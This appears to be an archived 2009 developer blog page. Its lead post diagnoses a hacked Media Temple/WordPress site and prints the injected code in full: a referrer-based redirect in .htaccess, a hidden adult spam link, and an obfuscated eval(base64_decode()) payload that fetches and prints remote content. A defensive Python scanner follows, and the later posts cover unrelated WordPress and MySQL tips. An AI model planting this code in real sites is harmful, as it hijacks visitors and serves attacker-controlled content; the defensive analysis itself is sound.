Media Temple/WordPress hacked
15 November 2009 | Posted by Jeffrey Barke | 34 comments
Update (2009-11-16): Given the large number of Grid-Service accounts hacked in a similar fashion, but not running WordPress, I've updated the title to reflect that this appears to be a Media Temple problem and not due to WordPress. I still don't have any definitive answers, though, and haven't seen any direct statements from either company.
While moving a WordPress site from Media Temple's Grid-Service (gs) to one of their dedicated virtual (dv) servers today, I noticed some "odd" lines in the root .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
I immediately knew that this install of WordPress had been compromised, but, prior to deleting the lines, I decided to Google them to find out more information about the problem. I found a good post by Adrian Hanft, which recommended another post by Kyle Brady.
It appears that this exploit is targeted at Media Temple's (gs) account and can also affect Drupal sites. None of the WordPress installs on my (dv) server were affected. All of them were on my (gs) account, including a domain that had Flyspray installed, but not WordPress.
All of the infected domains had the above code in the root .htaccess as well as the following code in the root index.php:
<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>
Some people reported that blog posts were affected and that the posts had to be manually recreated. So far, I have not detected any compromised posts or any other affected files other than .htaccess and index.php.
This exploit has affected people running up to at least version 2.85 of WordPress. Supposedly Media Temple is blaming WordPress and WordPress is blaming Media Temple. Regardless of whose fault it is, if you're running WordPress on Media Temple's Grid-Service, you should check your site out.
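As an added example (not code from the original post), here is a small Python scanner for the two indicators described above: a chain of RewriteCond lines on HTTP_REFERER followed by a RewriteRule that redirects off-site, and an eval(base64_decode()) call or a zero-size hidden link block in index.php. The sample files are constructed from the snippets in the post, with the attacker domains and the encoded payload replaced by placeholders.

```python
import re

# Constructed samples modelled on the injected .htaccess and index.php
# shown in the post; attacker domains are replaced with placeholders.
HTACCESS_INFECTED = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://redirect.example.invalid/in.cgi?4&parameter=sf [R,L]
"""
# The base64 string here is just "PLACEHOLDER" encoded, not a real payload.
INDEX_INFECTED = """<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://spam.example.invalid/">spam</a></font>
<?php eval(base64_decode("UExBQ0VIT0xERVI=")); ?>
<?php define('WP_USE_THEMES', true); require('./wp-blog-header.php'); ?>
"""

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
ANY_COND = re.compile(r"^\s*RewriteCond\b", re.I)
# RewriteRule whose target is an absolute URL and carries the R (redirect) flag
OFFSITE_REDIRECT = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://\S+\s+\[[^\]]*\bR(?:=\d+)?\b", re.I)
EVAL_B64 = re.compile(r"eval\s*\(\s*@?\s*base64_decode\s*\(", re.I)
# An element styled to zero size or hidden overflow that directly wraps a link
HIDDEN_LINK = re.compile(r'<(?:font|div|span)\b[^>]*style="[^"]*(?:height:\s*0|width:\s*0|overflow:\s*hidden)[^"]*"[^>]*>\s*<a\s', re.I)

def scan_htaccess(text):
    """Return (line_number, rule) for each RewriteRule that sends referrer-matched visitors off-site."""
    findings, referer_chain = [], False
    for num, line in enumerate(text.splitlines(), 1):
        if REFERER_COND.match(line):
            referer_chain = True          # a referrer condition opens a chain
        elif ANY_COND.match(line):
            pass                          # other conditions keep the chain open
        elif referer_chain and OFFSITE_REDIRECT.match(line):
            findings.append((num, line.strip()))
            referer_chain = False
        else:
            referer_chain = False         # any other directive ends the chain
    return findings

def scan_php(text):
    """Return sorted (line_number, indicator) pairs for obfuscated eval() and hidden links."""
    findings = []
    for num, line in enumerate(text.splitlines(), 1):
        if EVAL_B64.search(line):
            findings.append((num, "eval(base64_decode(...))"))
        if HIDDEN_LINK.search(line):
            findings.append((num, "hidden link"))
    return sorted(findings)
```

Run both functions over the real files of each domain on the account; a clean WordPress .htaccess (conditions on REQUEST_FILENAME, rule pointing at /index.php) produces no findings.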
Fixing the "missed schedule" posts problem in WordPress on Media Temple's (dv) server
11 November 2009 | Posted by Jeffrey Barke | No comments
I'm not sure why it never happened before; I guess I never tried to schedule a post in WordPress (since 2.7, anyway) on a Media Temple (dv) server (even though most of our clients are on Media Temple and many of them use WordPress!). Regardless, it was happening now—the infamous "missed schedule" problem.
Initially, I thought the problem was due to our staging server being secured by basic authentication. I removed it, but the problem persisted. Then I turned to the WordPress forums, but to no avail. The best answer was that it was a server configuration problem (every other suggestion seemed like a snake oil remedy). However, knowing that it was a server configuration problem didn't really help, since I had no idea what the server configuration issue was or how to resolve it.
It turns out the answer was simple and only one Google query away:
… Media Temple's (dv) configuration was responsible for the "Missed schedule" errors I was getting in WordPress. By default, the /etc/hosts file looks like this:
127.0.0.1 yourdomain.com yourdomain localhost localhost.localdomain
To execute cron tasks, WordPress needs to post to the URL http://yourdomain.com/wp-cron.php?doing_wp_cron. This isn't usually a problem, but with the above hosts file and Plesk's Apache configuration, that URL will actually result in a 404 error.
To resolve this, SSH into your (dv) server and run the following commands:
vi /etc/hosts
Press I to enter insert mode
Change the hosts file to read:
127.0.0.1 localhost localhost.localdomain
xxx.xxx.xxx.xxx yourdomain.com yourdomain
Press ESC to exit insert mode and :wq to save your changes and exit.
That's it! There's no need to restart the server. Note—This is not necessary on Media Temple's (gs) service. Scheduling should work fine there.
Quick guide to working with Subversion via SvnX on Mac OS X
3 December 2008 | Posted by Jeffrey Barke | No comments
I just posted a quick guide on working with Subversion via SvnX on Mac OS X to theMechanism's blog in anticipation of tomorrow night's New York Web Standards Meetup presentation on Small Web Team Collaboration with Subversion by Scott Trudeau.
Adhesive 3.4.0 released
30 November 2008 | Posted by Jeffrey Barke | 2 comments
Adhesive 3.4.0, a WordPress plugin that allows one to easily mark posts "sticky," is now released. Sticky posts always appear at the top of the page when several posts are displayed.
The most important changes to Adhesive in version 3.4.0 are:
- Compatibility with WordPress 2.6.5.
- No longer breaks the native paging functionality in WordPress.
- Removes all Adhesive-added rows from the wp_postmeta table on plugin deactivation.
- All configuration options and the admin panel menu have been removed. Adhesive simply makes posts sticky—there's really nothing to configure.
- Solo file functionality has been removed.
Get Adhesive 3.4.0.
CushyCMS review—A well-designed, lightweight CMS
12 November 2008 | Posted by Jeffrey Barke | 9 comments
CushyCMS is a hosted CMS that works with existing sites and seems like a perfect solution for freelancers, budget-conscious clients and brochureware. It's free, very easy to use and administer and has a cute user interface. All you need to get started is your own web host and FTP credentials.
Creating a new CushyCMS account is easy and takes less than a minute. It only requires a name, email and password. There is no email verification process to endure—the account is created and activated immediately.
Once the account is created, you add a "new" site by supplying its FTP information. Then you "assign" pages to the site by specifying paths to existing files. If this step sounds complicated, let me assure you it's not. The user interface is so well-designed that even Web novices should have no problem with this.

After assigning a page to a site, clicking its title will bring up the CushyCMS editor. All areas previously marked up on the page with the class name cushycms will appear as editable regions. Headings appear as single lines, images have an uploader and other elements have full visual editors.

Collaboration is made possible by adding other users (known as "editors") to the account. These users can be granted editing rights on a per-site and per-page basis.
CushyCMS's simplicity will definitely appeal to certain clients and makes sense for certain types of websites. The price (you can't beat free) is definitely suitable for low-budget projects, and the fact that the system requires no programming knowledge will make it useful for freelancers and designers who know HTML and CSS, but no programming languages. The deployment time? Negligible.
However, CushyCMS definitely has limitations as a CMS. There's no way to add new pages, to preview work prior to publishing, or to require approval prior to another user publishing their work. Since CushyCMS is not database-driven, there are no "template" functions and no way to dynamically derive certain types of information (such as navigation or a sitemap).
Bottom line: CushyCMS is a very cool, but very limited product. It definitely has its uses, but its strengths and weaknesses should be understood and evaluated in terms of a client's needs and expectations. If they match, I definitely recommend it. If not, I suggest WordPress or Drupal.
For those who pay attention to this sort of thing: CushyCMS is powered on the client-side by Prototype, script.aculo.us, Lightbox and FCKeditor.
CAST()ing a sort in MySQL
11 November 2008 | Posted by Jeffrey Barke | No comments
I was asked to sort a table of lease data by floor in descending order today—simple, right? But after updating the query with ORDER BY floor DESC, I noticed the results were wrong. The 9th floor was always at the top and the 10th floor and above were between the second and first floors.
It was immediately obvious—the floor field was not stored as numeric data, but as character data. This struck me as odd, so I investigated the DB structure and values. The floor field was definitely being stored as character data, but why? The reason: the client wanted to store certain floors as LL.
So given this structure, how could I quickly and easily sort the floors? The answer: MySQL's CAST function. By casting the floor field as an integer, the numeric floors would sort correctly. Even better, the character data LL would cast to 0, preserving a correct sort.
I updated the query with ORDER BY CAST(floor as UNSIGNED) DESC and obtained the desired results. Learn more about MySQL's cast functions and operators.
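As an added example (not from the original post), the following Python snippet reproduces the mis-sort and the CAST fix on an in-memory SQLite table standing in for MySQL. The table and floor values are constructed; SQLite has no UNSIGNED type, so the query uses CAST(floor AS INTEGER), which, like MySQL's cast, turns non-numeric text such as LL into 0.

```python
import sqlite3

# Constructed sample: floors stored as character data so that "LL"
# (lower level) can live alongside numeric floors, as in the post.
FLOORS = ["1", "2", "9", "10", "11", "LL"]

def sort_floors(cast=False):
    """Return the floors in descending order, sorted either as text
    (the original query) or after CAST to an integer (the fix)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE lease (id INTEGER PRIMARY KEY, floor VARCHAR(4))")
    con.executemany("INSERT INTO lease (floor) VALUES (?)", [(f,) for f in FLOORS])
    # MySQL: ORDER BY CAST(floor AS UNSIGNED) DESC. SQLite has no UNSIGNED, but
    # CAST(... AS INTEGER) likewise turns non-numeric text such as "LL" into 0.
    sql = ("SELECT floor FROM lease ORDER BY CAST(floor AS INTEGER) DESC" if cast
           else "SELECT floor FROM lease ORDER BY floor DESC")
    rows = [r[0] for r in con.execute(sql)]
    con.close()
    return rows
```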
Cali Lewis and Neal Campbell on podcasting
1 November 2008 | Posted by Jeffrey Barke | No comments
Cali Lewis and Neal Campbell of GeekBrief.TV talk about GeekBrief.TV, podcasting, Ustream.tv and WordPress during WordCamp Dallas 2008.
Source: One Man's Blog
WordCamp NY 2008 photos and videos available
15 October 2008 | Posted by Jeffrey Barke | No comments
Photos and videos from the 2008 WordCamp NY are now available at firesidemedia.net/dev/wordcamp-ny-2008-photos-videos/.
Part one of Matt Mullenweg's keynote address to WordCamp NY 2008:
dig and whois for Windows
21 August 2008 | Posted by Jeffrey Barke | No comments
At http://members.shaw.ca/nicholas.fong/dig/, you can download Windows 2000, XP and Vista binaries for dig and WHOIS. The page also includes installation instructions and examples of how to query the DNS with dig.
WordPress 2.6.1 released yesterday
16 August 2008 | Posted by Jeffrey Barke | No comments
WordPress 2.6.1 was released yesterday. This is a maintenance release only, and, if you're happy using 2.6, you can continue to use it.

